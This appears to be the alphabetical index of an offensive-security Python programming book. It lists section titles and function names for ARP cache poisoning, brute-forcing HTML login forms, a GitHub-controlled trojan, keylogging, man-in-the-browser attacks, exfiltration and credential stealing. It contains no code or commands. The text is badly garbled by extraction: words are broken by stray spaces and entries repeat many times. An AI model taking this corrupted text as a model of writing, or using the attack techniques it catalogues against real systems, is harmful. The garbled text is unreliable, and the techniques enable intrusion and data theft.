writin g-tu to ria l- p art- 9 -in tr o ductio n-to -w in 32-s h ellc o din g/
.

In dex
A N O TE O N T H E D IG IT A L I N DEX
A lin k in a n in dex e ntr y is d is p la yed a s th e s e ctio n tit le in w hic h th at e ntr y a ppears . B ecause s o m e s e ctio ns h ave m ult ip le in dex
mark ers , it is n ot u nusu al f o r a n e ntr y to h ave s e vera l lin ks to th e s a m e s e ctio n. C lic kin g o n a ny lin k w ill ta ke y ou d ir e ctly to th e p la ce
in th e te xt in w hic h th e m ark er a ppears .
A
Addre ss R eso lu ti o n P ro to co l,
ARP C ache P ois o nin g w ith S cap y
( s e e A RP c ache p ois o nin g)
Adju stT okenP riv ile ges f u ncti o n,
Win d ow s T oken P riv ile ges
AF_IN ET p ara m ete r,
The N etw ork : B asic s
ARP ( A ddre ss R eso lu ti o n P ro to co l) c ache p ois o nin g,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache
Pois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP
Cache P ois o nin g w ith S cap y
ad din g s u p porti n g f u ncti o ns,
ARP C ache P ois o nin g w ith S cap y
co din g p ois o nin g s c rip t,
ARP C ache P ois o nin g w ith S cap y
in sp ecti n g c ache,
ARP C ache P ois o nin g w ith S cap y
te sti n g,
ARP C ache P ois o nin g w ith S cap y
B
BH PFuzze r c la ss,
Burp F uzzin g
Bin g s e arc h e ngin e,
Kic kin g th e T ir e s
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
defin in g e xte nd er c la ss,
Bin g f o r B urp
fu ncti o nality to p ars e r e su lts ,
Bin g f o r B urp
fu ncti o nality to p erfo rm q uery ,
Bin g f o r B urp
te sti n g,
Bin g f o r B urp
,
Bin g f o r B urp
bin g_ m enu f u ncti o n,
Bin g f o r B urp
bin g_ se arc h f u ncti o n,
Bin g f o r B urp
Bio nd i, P hilip pe,
Ow nin g th e N etw ork w ith S cap y
BitB lt f u ncti o n,
Takin g S cre ensh o ts
Bro w se r H elp er O bje cts ,
Cre ati n g th e S erv er
bru te f o rc e a tta cks,
Kic kin g th e T ir e s
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g
Dir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g
Dir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g H TM L

Form A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Kic kin g th e T ir e s
in H TM L f o rm a uth enti c ati o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L
Form A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Kic kin g th e T ir e s
ad m in is tr a to r l o gin f o rm ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
genera l s e tti n gs,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
HTM L p ars in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
pasti n g i n w ord lis t,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
prim ary b ru te -fo rc in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
re q uest f lo w ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
te sti n g,
Kic kin g th e T ir e s
on d ir e cto rie s a nd f ile l o cati o ns,
Kic kin g th e T ir e s
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
ap ply in g l is t o f e xte nsio ns to te st f o r,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
cre ati n g l is t o f e xte nsio ns,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
cre ati n g Q ueue o bje cts o ut o f w ord lis t f ile s,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
se tti n g u p w ord lis t,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
te sti n g,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
build _w ord lis t f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Burp E xte nd er A PI,
Exte nd in g B urp P ro xy
,
Exte nd in g B urp P ro xy
,
Exte nd in g B urp P ro xy
,
Burp
Fuzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp
Fuzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Turn in g W eb site C onte nt i n to P assw ord
Gold
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old

cre ati n g p assw ord -g uessin g w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g
Web site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g
Web site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
co nv erti n g s e le cte d H TTP tr a ffic i n to w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
fu ncti o nality to d is p la y w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
te sti n g,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord
Gold
cre ati n g w eb a p plic ati o n f u zze rs ,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp
Fuzzin g
,
Burp F uzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
accessin g B urp d ocum enta ti o n,
Burp F uzzin g
im ple m enti n g c o de to m eet r e q uir e m ents ,
Burp F uzzin g
lo ad in g e xte nsio n,
Burp F uzzin g
,
Burp F uzzin g
sim ple f u zze r,
Burp F uzzin g
usin g e xte nsio n i n a tta cks,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
in sta llin g,
Exte nd in g B urp P ro xy
,
Burp F uzzin g
in te rfa cin g w ith B in g A PI to s h o w a ll v ir tu al h o sts ,
Kic kin g th e T ir e s
,
Bin g f o r B urp
,
Bin g f o r
Burp
,
Bin g f o r B urp
,
Bin g f o r B urp
,
Bin g f o r B urp
defin in g e xte nd er c la ss,
Bin g f o r B urp
fu ncti o nality to p ars e r e su lts ,
Bin g f o r B urp
fu ncti o nality to p erfo rm q uery ,
Bin g f o r B urp
te sti n g,
Bin g f o r B urp
,
Bin g f o r B urp
Jy th o n s ta nd alo ne J A R f ile ,
Exte nd in g B urp P ro xy
,
Burp F uzzin g
Burp E xte nd er c la ss,
Burp F uzzin g
C
Cain a nd A bel,
Kic kin g th e T ir e s
CA NVA S,
Pyth o nic S hellc o de E xecuti o n
,
Pyth o nic S hellc o de E xecuti o n
channel m eth o d,
SSH T unnelin g
Clie ntC onnecte d m essa ge,
SSH w ith P ara m ik o
co de i n je cti o n,
Kic kin g th e T ir e s
,
Dir e ct C ode I n je cti o n
offe nsiv e f o re nsic s a uto m ati o n,
Dir e ct C ode I n je cti o n
Win d ow s p riv ile ge e sc ala ti o n,
Kic kin g th e T ir e s
co nfig d ir e cto ry ,
Gith ub C om mand a nd C ontr o l

co nnect_ to _gith ub f u ncti o n,
Build in g a G ith ub -A w are T ro ja n
Conte nt- L ength h ead er,
Man-in -th e-B ro w se r ( K in d O f)
co unt p ara m ete r,
Ow nin g th e N etw ork w ith S cap y
cre ate M enuIte m f u ncti o n,
Bin g f o r B urp
cre ate N ew In sta nce f u ncti o n,
Burp F uzzin g
Cre ate P ro cess f u ncti o n,
Cre ati n g a P ro cess M onito r
Cre d R eq uestH and le r c la ss,
Man-in -th e-B ro w se r ( K in d O f)
cty p es m odule ,
Deco din g th e I P L ayer
D
data d ir e cto ry ,
Gith ub C om mand a nd C ontr o l
Deb ug P ro be ta b , W in gID E,
Win gID E
Desti n ati o n U nre achab le m essa ge,
Kic kin g th e T ir e s
,
Deco din g I C M P
Dir B uste r p ro je ct,
Kic kin g th e T ir e s
dir _ bru te r f u ncti o n,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
dis p la y_ w ord lis t f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
E
easy _ in sta ll f u ncti o n,
In sta llin g K ali L in ux
El J e fe p ro je ct,
Cre ati n g a P ro cess M onito r
encry p t_ post f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
encry p t_ str in g f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
env ir o nm ent s e tu p ,
Setti n g U p Y our P yth o n E nv ir o nm ent
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali
Lin ux
,
In sta llin g K ali L in ux
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E

Kali L in ux,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
defa ult u se rn am e a nd p assw ord ,
In sta llin g K ali L in ux
desk to p e nv ir o nm ent,
In sta llin g K ali L in ux
dete rm in in g v ers io n,
In sta llin g K ali L in ux
dow nlo ad in g i m age,
In sta llin g K ali L in ux
genera l d is c ussio n,
In sta llin g K ali L in ux
Win gID E,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
,
Win gID E
accessin g,
Win gID E
fix in g m is sin g d ep end encie s,
Win gID E
genera l d is c ussio n,
In sta llin g K ali L in ux
in sp ecti n g a nd m odify in g l o cal v aria b le s,
Win gID E
,
Win gID E
in sta llin g,
Win gID E
openin g b la nk P yth o n f ile ,
Win gID E
se tti n g b re akp oin ts ,
Win gID E
se tti n g s c rip t f o r d eb uggin g,
Win gID E
,
Win gID E
vie w in g s ta ck tr a ce,
Win gID E
,
Win gID E
Erro rs ta b , B urp ,
Kic kin g th e T ir e s
exfiltr a te f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
exfiltr a ti o n,
Cre ati n g th e S erv er
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r
Exfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M
Auto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
encry p ti o n r o uti n es,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
key g enera ti o n s c rip t,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
lo gin f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
posti n g f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
su p porti n g f u ncti o ns,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
te sti n g,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
Exte nd er ta b , B urp ,
Burp F uzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
extr a ct_ im age f u ncti o n,
PC A P P ro cessin g
F

fe ed m eth o d,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Fid ao , C hris ,
PC A P P ro cessin g
File C ookie Ja r c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
filte r p ara m ete r,
Ow nin g th e N etw ork w ith S cap y
fin d _m odule f u ncti o n,
Hackin g P yth o n’s i m port F uncti o nality
fo rw ard S SH tu nnelin g,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
Fris c h, D an,
Win d ow s P riv ile ge E sc ala ti o n
G
GDI ( W in d ow s G ra p hic s D ev ic e I n te rfa ce),
Kic kin g th e T ir e s
GET r e q uests ,
The S ocket L ib ra ry o f th e W eb : u rllib 2
GetA sy ncK eyS ta te f u ncti o n,
Sand box D ete cti o n
GetF ore G ro und W in d ow f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
getG enera to rN am e f u ncti o n,
Burp F uzzin g
GetL astI n p utI n fo f u ncti o n,
Sand box D ete cti o n
getN extP aylo ad f u ncti o n,
Burp F uzzin g
GetO w ner f u ncti o n,
Pro cess M onito rin g w ith W MI
GetT ic kC ount f u ncti o n,
Sand box D ete cti o n
GetW in d ow DC f u ncti o n,
Takin g S cre ensh o ts
GetW in d ow TextA f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
GetW in d ow Thre ad P ro cessId f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
get_ file _ co nte nts f u ncti o n,
Build in g a G ith ub -A w are T ro ja n
get_ http _head ers f u ncti o n,
PC A P P ro cessin g
get_ m ac f u ncti o n,
ARP C ache P ois o nin g w ith S cap y
get_ tr o ja n_ co nfig f u ncti o n,
Build in g a G ith ub -A w are T ro ja n
get_ w ord s f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
GitH ub -a w are tr o ja ns,
Gith ub C om mand a nd C ontr o l
,
Gith ub C om mand a nd C ontr o l
,
Cre ati n g
Module s
,
Tro ja n C onfig ura ti o n
,
Build in g a G ith ub -A w are T ro ja n
,
Hackin g P yth o n’s i m port
Functi o nality
,
Hackin g P yth o n’s i m port F uncti o nality
,
Kic kin g th e T ir e s

acco unt s e tu p ,
Gith ub C om mand a nd C ontr o l
build in g,
Build in g a G ith ub -A w are T ro ja n
co nfig urin g,
Tro ja n C onfig ura ti o n
cre ati n g m odule s,
Cre ati n g M odule s
hackin g i m port f u ncti o nality ,
Hackin g P yth o n’s i m port F uncti o nality
im pro vem ents a nd e nhancem ents to ,
Kic kin g th e T ir e s
te sti n g,
Hackin g P yth o n’s i m port F uncti o nality
gith ub 3 m odule ,
In sta llin g K ali L in ux
GitI m porte r c la ss,
Hackin g P yth o n’s i m port F uncti o nality
H
hand le _ clie nt f u ncti o n,
TC P S erv er
hand le _ co m ment f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
hand le _ data f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Turn in g W eb site C onte nt i n to
Passw ord G old
hand le _ end ta g f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
hand le _ sta rtta g f u ncti o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Hash D um p o bje ct,
Gra b bin g P assw ord H ash es
hash d um p p lu gin ,
Gra b bin g P assw ord H ash es
hasM ore P aylo ad s f u ncti o n,
Burp F uzzin g
hex d um pin g f u ncti o n,
Build in g a T C P P ro xy
hiv elis t p lu gin ,
Gra b bin g P assw ord H ash es
HookM anager c la ss,
Keylo ggin g f o r F un a nd K eystr o kes
HTM L f o rm a uth enti c ati o n, b ru te f o rc in g,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g
HTM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Kic kin g th e T ir e s

ad m in is tr a to r l o gin f o rm ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
genera l s e tti n gs,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
HTM L p ars in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
pasti n g i n w ord lis t,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
prim ary b ru te -fo rc in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
re q uest f lo w ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
te sti n g,
Kic kin g th e T ir e s
HTM LPars e r c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Turn in g W eb site C onte nt i n to P assw ord G old
HTTP h is to ry ta b , B urp ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
I
IB urp E xte nd er c la ss,
Burp F uzzin g
,
Bin g f o r B urp
IC M P m essa ge d eco din g r o uti n e,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Deco din g
IC M P
,
Deco din g I C M P
,
Deco din g I C M P
,
Deco din g I C M P
Desti n ati o n U nre achab le m essa ge,
Kic kin g th e T ir e s
,
Deco din g I C M P
le ngth c alc ula ti o n,
Deco din g I C M P
messa ge e le m ents ,
Kic kin g th e T ir e s
se nd in g U D P d ata gra m s a nd i n te rp re ti n g r e su lts ,
Deco din g I C M P
te sti n g,
Deco din g I C M P
IC onte xtM enuF acto ry c la ss,
Bin g f o r B urp
IC onte xtM enuIn v ocati o n c la ss,
Bin g f o r B urp
Ie xp lo re .e xe p ro cess,
Cre ati n g th e S erv er
ifa ce p ara m ete r,
Ow nin g th e N etw ork w ith S cap y
IIn tr u d erP aylo ad G enera to r c la ss,
Burp F uzzin g
IIn tr u d erP aylo ad G enera to rF acto ry c la ss,
Burp F uzzin g
im age c arv in g s c rip t,
Kic kin g th e T ir e s
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
PC A P P ro cessin g
ad din g f a cia l d ete cti o n c o de,
PC A P P ro cessin g
ad din g s u p porti n g f u ncti o ns,
PC A P P ro cessin g
co din g p ro cessin g s c rip t,
PC A P P ro cessin g
te sti n g,
PC A P P ro cessin g

im agein fo p lu gin ,
Auto m ati n g O ffe nsiv e F ore nsic s
IM AP c re d enti a ls , s te alin g,
Ow nin g th e N etw ork w ith S cap y
,
Ste alin g E m ail C re d enti a ls
Im munity D eb ugger,
Dir e ct C ode I n je cti o n
,
Dir e ct C ode I n je cti o n
im p m odule ,
Hackin g P yth o n’s i m port F uncti o nality
__in it_ _ m eth o d,
Deco din g th e I P L ayer
in je ct_ co de f u ncti o n,
Code I n je cti o n
in p ut ta gs,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
in p ut/ o utp ut c o ntr o l ( IO CTL),
Packet S niffin g o n W in d ow s a nd L in ux
,
Packet S niffin g o n W in d ow s
and L in ux
In te rn et E xp lo re r C O M a uto m ati o n,
Fun w ith I n te rn et E xp lo re r
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-
in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -
th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Cre ati n g th e S erv er
,
Cre ati n g th e S erv er
,
IE
CO M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r
Exfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M
Auto m ati o n f o r E xfiltr a ti o n
exfiltr a ti o n,
Cre ati n g th e S erv er
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r
Exfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
,
IE C O M
Auto m ati o n f o r E xfiltr a ti o n
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
encry p ti o n r o uti n es,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
key g enera ti o n s c rip t,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
lo gin f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
posti n g f u ncti o nality ,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
su p porti n g f u ncti o ns,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
te sti n g,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
man-in -th e-b ro w se r a tta cks,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-
in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-
in -th e-B ro w se r ( K in d O f)
,
Cre ati n g th e S erv er
cre ati n g H TTP s e rv er,
Man-in -th e-B ro w se r ( K in d O f)
defin ed ,
Man-in -th e-B ro w se r ( K in d O f)
main l o op,
Man-in -th e-B ro w se r ( K in d O f)
su p port s tr u ctu re f o r,
Man-in -th e-B ro w se r ( K in d O f)
te sti n g,
Cre ati n g th e S erv er
waiti n g f o r b ro w se r f u ncti o nality ,
Man-in -th e-B ro w se r ( K in d O f)
In tr u d er ta b , B urp ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s

In tr u d er to ol, B urp ,
Burp F uzzin g
IO CTL ( in p ut/ o utp ut c o ntr o l) ,
Packet S niffin g o n W in d ow s a nd L in ux
,
Packet S niffin g o n W in d ow s
and L in ux
IP h ead er d eco din g r o uti n e,
Packet S niffin g o n W in d ow s a nd L in ux
,
Deco din g th e I P L ayer
,
Deco din g
th e I P L ayer
,
Deco din g th e I P L ayer
,
Deco din g th e I P L ayer
av oid in g b it m anip ula ti o n,
Deco din g th e I P L ayer
hum an-re ad ab le p ro to co l,
Deco din g th e I P L ayer
te sti n g,
Deco din g th e I P L ayer
ty p ic al I P v4 h ead er s tr u ctu re ,
Deco din g th e I P L ayer
J
Ja nze n, C liff,
Win d ow s P riv ile ge E sc ala ti o n
JS O N f o rm at,
Tro ja n C onfig ura ti o n
Jy th o n s ta nd alo ne J A R f ile ,
Exte nd in g B urp P ro xy
,
Burp F uzzin g
K
Kali L in ux,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
defa ult u se rn am e a nd p assw ord ,
In sta llin g K ali L in ux
desk to p e nv ir o nm ent,
In sta llin g K ali L in ux
dete rm in in g v ers io n,
In sta llin g K ali L in ux
dow nlo ad in g i m age,
In sta llin g K ali L in ux
genera l d is c ussio n,
In sta llin g K ali L in ux
in sta llin g p ackages,
In sta llin g K ali L in ux
KeyD ow n e v ent,
Keylo ggin g f o r F un a nd K eystr o kes
keylo ggin g,
Keylo ggin g f o r F un a nd K eystr o kes
KeyS tr o ke f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
Khra is , H ussa m ,
SSH w ith P ara m ik o
Kuczm ars k i, K aro l,
Hackin g P yth o n’s i m port F uncti o nality
L
LA ST IN PU TIN FO s tr u ctu re ,
Sand box D ete cti o n
lo ad _m odule f u ncti o n,
Hackin g P yth o n’s i m port F uncti o nality
lo gin _ fo rm _in d ex f u ncti o n,
Man-in -th e-B ro w se r ( K in d O f)

lo gin _ to _tu m blr f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
lo go ut_ fo rm f u ncti o n,
Man-in -th e-B ro w se r ( K in d O f)
lo go ut_ url f u ncti o n,
Man-in -th e-B ro w se r ( K in d O f)
M
man-in -th e-b ro w se r ( M itB ) a tta cks,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Cre ati n g th e S erv er
cre ati n g H TTP s e rv er,
Man-in -th e-B ro w se r ( K in d O f)
defin ed ,
Man-in -th e-B ro w se r ( K in d O f)
main l o op,
Man-in -th e-B ro w se r ( K in d O f)
su p port s tr u ctu re f o r,
Man-in -th e-B ro w se r ( K in d O f)
te sti n g,
Cre ati n g th e S erv er
waiti n g f o r b ro w se r f u ncti o nality ,
Man-in -th e-B ro w se r ( K in d O f)
man-in -th e-m id dle ( M IT M ) a tta cks,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith
Scap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g
with S cap y
ad din g s u p porti n g f u ncti o ns,
ARP C ache P ois o nin g w ith S cap y
co din g p ois o nin g s c rip t,
ARP C ache P ois o nin g w ith S cap y
in sp ecti n g c ache,
ARP C ache P ois o nin g w ith S cap y
te sti n g,
ARP C ache P ois o nin g w ith S cap y
mangle f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
Meta sp lo it,
Pyth o nic S hellc o de E xecuti o n
Mic ro so ft,
Kic kin g th e T ir e s
( s e e B in g s e arc h e ngin e; I n te rn et E xp lo re r C O M a uto m ati o n)
MitB a tta cks,
Man-in -th e-B ro w se r ( K in d O f)
( s e e m an-in -th e-b ro w se r a tta cks)
MIT M a tta cks,
ARP C ache P ois o nin g w ith S cap y
( s e e m an-in -th e-m id dle a tta cks)
module s d ir e cto ry ,
Gith ub C om mand a nd C ontr o l
module _ ru nner f u ncti o n,
Hackin g P yth o n’s i m port F uncti o nality
muta te _ paylo ad f u ncti o n,
Burp F uzzin g
N
Nath o o, K arim ,
Man-in -th e-B ro w se r ( K in d O f)
neta d dr m odule ,
Deco din g I C M P
,
Kic kin g th e T ir e s

netc at- lik e f u ncti o nality ,
TC P S erv er
,
TC P S erv er
,
TC P S erv er
,
Rep la cin g N etc at
,
Rep la cin g N etc at
,
Rep la cin g N etc at
,
Rep la cin g N etc at
,
Rep la cin g N etc at
,
Rep la cin g N etc at
,
Rep la cin g N etc at
,
Rep la cin g N etc at
,
Rep la cin g N etc at
ad din g c lie nt c o de,
Rep la cin g N etc at
callin g f u ncti o ns,
Rep la cin g N etc at
co m mand e xecuti o n f u ncti o nality ,
Rep la cin g N etc at
co m mand s h ell,
Rep la cin g N etc at
cre ati n g m ain f u ncti o n,
Rep la cin g N etc at
cre ati n g p rim ary s e rv er l o op,
Rep la cin g N etc at
cre ati n g s tu b f u ncti o n,
Rep la cin g N etc at
file u p lo ad f u ncti o nality ,
Rep la cin g N etc at
im porti n g l ib ra rie s,
TC P S erv er
se tti n g g lo bal v aria b le s,
TC P S erv er
te sti n g,
Rep la cin g N etc at
netw ork b asic s,
The N etw ork : B asic s
,
The N etw ork : B asic s
,
TC P C lie nt
,
TC P S erv er
,
TC P S erv er
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Build in g a T C P P ro xy
,
Build in g a T C P P ro xy
,
Build in g a T C P
Pro xy
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith
Para m ik o
,
SSH w ith P ara m ik o
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e
Tir e s
,
SSH T unnelin g
,
SSH T unnelin g
,
SSH T unnelin g

cre ati n g T C P c lie nts ,
The N etw ork : B asic s
cre ati n g T C P p ro xie s,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Build in g a T C P P ro xy
,
Build in g a T C P
Pro xy
,
Build in g a T C P P ro xy
hex d um pin g f u ncti o n,
Build in g a T C P P ro xy
pro xy_ hand le r f u ncti o n,
Build in g a T C P P ro xy
re aso ns f o r,
Kic kin g th e T ir e s
te sti n g,
Build in g a T C P P ro xy
cre ati n g T C P s e rv ers ,
TC P S erv er
cre ati n g U D P c lie nts ,
TC P C lie nt
netc at- lik e f u ncti o nality ,
TC P S erv er
( s e e n etc at- lik e f u ncti o nality )
SSH tu nnelin g,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
SSH
Tunnelin g
,
SSH T unnelin g
,
SSH T unnelin g
fo rw ard ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
re v ers e ,
Kic kin g th e T ir e s
,
SSH T unnelin g
,
SSH T unnelin g
te sti n g,
SSH T unnelin g
SSH w ith P ara m ik o ,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
